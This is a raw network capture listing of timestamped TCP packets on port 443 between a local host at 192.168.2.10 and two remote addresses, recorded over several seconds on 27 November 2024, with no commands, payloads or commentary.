                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.776611090 CET44349764172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.776736975 CET49764443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.776984930 CET49764443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.777002096 CET44349764172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.937846899 CET4434976813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.938513041 CET49768443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.938536882 CET4434976813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.938946962 CET49768443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:45.938954115 CET4434976813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.047013044 CET4434976613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.047096014 CET4434976613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.047169924 CET49766443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.048013926 CET49766443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.048033953 CET4434976613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.048074961 CET49766443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.048082113 CET4434976613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.051527977 CET49770443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.051538944 CET4434977013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.051603079 CET49770443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.051791906 CET49770443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.051805019 CET4434977013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.234966993 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.235023975 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.235131979 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.235429049 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.235441923 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.374553919 CET4434976813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.374633074 CET4434976813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.374722958 CET49768443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.374877930 CET49768443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.374893904 CET4434976813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.374921083 CET49768443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.374927044 CET4434976813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.377441883 CET49772443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.377490997 CET4434977213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.377568960 CET49772443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.377712965 CET49772443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:46.377729893 CET4434977213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.165081024 CET4434976913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.168087006 CET49769443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.168095112 CET4434976913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.168585062 CET49769443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.168590069 CET4434976913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.457603931 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.457732916 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.460454941 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.460468054 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.460726023 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.464549065 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.465261936 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.465301037 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.465424061 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.465457916 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.467128992 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.467175961 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.467633009 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.467670918 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.467782021 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.467818975 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.467959881 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.467987061 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.467995882 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.468019009 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.468152046 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.468175888 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.468194962 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.468297005 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.468324900 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.515327930 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.517633915 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.517672062 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.517703056 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.517723083 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.517750978 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.517771959 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.517788887 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.517802000 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.611329079 CET4434976913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.611397028 CET4434976913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.611489058 CET49769443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.611737013 CET49769443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.611747026 CET4434976913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.611758947 CET49769443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.611764908 CET4434976913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.614589930 CET49773443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.614645958 CET4434977313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.614762068 CET49773443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.614897966 CET49773443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.614906073 CET4434977313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.861794949 CET4434975913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.861984015 CET4434975913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.862044096 CET49759443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.862232924 CET49759443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.862253904 CET4434975913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.862268925 CET49759443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.862274885 CET4434975913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.865803003 CET49774443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.865859032 CET4434977413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.865926027 CET49774443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.866061926 CET49774443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.866080046 CET4434977413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.897514105 CET4434977013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.898005962 CET49770443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.898031950 CET4434977013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.898471117 CET49770443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:47.898482084 CET4434977013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.165026903 CET4434977213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.165651083 CET49772443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.165680885 CET4434977213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.166141033 CET49772443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.166147947 CET4434977213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.410516024 CET4434977013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.410588026 CET4434977013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.410723925 CET49770443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.410862923 CET49770443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.410881042 CET4434977013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.410914898 CET49770443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.410936117 CET4434977013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.413880110 CET49775443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.413909912 CET4434977513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.414046049 CET49775443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.414299011 CET49775443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.414309025 CET4434977513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.773408890 CET4434977213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.773509979 CET4434977213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.773581028 CET49772443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.773761034 CET49772443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.773798943 CET4434977213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.773828030 CET49772443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.773844004 CET4434977213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.776904106 CET49776443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.776925087 CET4434977613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.777133942 CET49776443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.777215958 CET49776443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:48.777230024 CET4434977613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.398402929 CET4434977313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.399046898 CET49773443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.399056911 CET4434977313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.399530888 CET49773443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.399534941 CET4434977313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.749522924 CET4434977413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.750052929 CET49774443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.750080109 CET4434977413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.750669003 CET49774443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.750677109 CET4434977413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.842894077 CET4434977313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.842978001 CET4434977313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.843039036 CET49773443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.843225956 CET49773443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.843246937 CET4434977313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.843257904 CET49773443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.843265057 CET4434977313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.845825911 CET49777443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.845873117 CET4434977713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.845985889 CET49777443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.846117020 CET49777443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:49.846136093 CET4434977713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.195924997 CET4434977413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.196083069 CET4434977413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.196175098 CET49774443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.196280956 CET49774443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.196305037 CET4434977413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.196321011 CET49774443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.196327925 CET4434977413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.198900938 CET49778443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.198935986 CET4434977813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.199028969 CET49778443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.199176073 CET49778443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.199198008 CET4434977813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.269362926 CET4434977513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.269910097 CET49775443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.269922018 CET4434977513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.270394087 CET49775443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.270399094 CET4434977513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.558892965 CET4434977613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.559879065 CET49776443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.559900999 CET4434977613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.560386896 CET49776443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.560410976 CET4434977613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.722557068 CET4434977513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.722632885 CET4434977513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.722728014 CET49775443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.722965002 CET49775443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.722971916 CET4434977513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.723010063 CET49775443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.723016024 CET4434977513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.726006985 CET49779443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.726058960 CET4434977913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.726202011 CET49779443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.726397991 CET49779443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.726416111 CET4434977913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.848793983 CET4434976713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.849268913 CET49767443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.849298000 CET4434976713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.849730015 CET49767443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:50.849735975 CET4434976713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.009134054 CET4434977613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.009211063 CET4434977613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.009311914 CET49776443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.009552002 CET49776443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.009586096 CET4434977613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.009594917 CET49776443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.009602070 CET4434977613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.012787104 CET49780443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.012830019 CET4434978013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.012958050 CET49780443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.013170958 CET49780443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.013185024 CET4434978013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.307251930 CET4434976713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.307334900 CET4434976713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.307405949 CET49767443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.307600975 CET49767443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.307631016 CET4434976713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.307651043 CET49767443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.307657003 CET4434976713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.310610056 CET49781443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.310651064 CET4434978113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.310764074 CET49781443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.310935974 CET49781443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.310950994 CET4434978113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.573013067 CET4434977713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.574059963 CET49777443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.574084997 CET4434977713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.574193001 CET49777443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.574203968 CET4434977713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.943021059 CET4434977813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.943654060 CET49778443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.943666935 CET4434977813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.944060087 CET49778443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:51.944075108 CET4434977813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.007824898 CET4434977713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.007913113 CET4434977713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.008014917 CET49777443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.008179903 CET49777443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.008179903 CET49777443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.008197069 CET4434977713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.008200884 CET4434977713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.011042118 CET49782443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.011080027 CET4434978213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.011158943 CET49782443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.011853933 CET49782443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.011863947 CET4434978213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.080693960 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.080792904 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.080852032 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.081000090 CET49771443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.081015110 CET44349771172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.091418982 CET49783443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.091469049 CET44349783172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.091557980 CET49783443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.092152119 CET49783443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.092163086 CET44349783172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.525108099 CET4434977913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.525918007 CET49779443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.525935888 CET4434977913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.526417971 CET49779443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.526428938 CET4434977913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.756762028 CET4434977813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.756827116 CET4434977813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.756938934 CET49778443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.757162094 CET49778443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.757184982 CET4434977813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.757203102 CET49778443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.757210970 CET4434977813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.759987116 CET49784443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.760027885 CET4434978413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:52.760118008 CET49784443192.168.2.1013.107.246.43
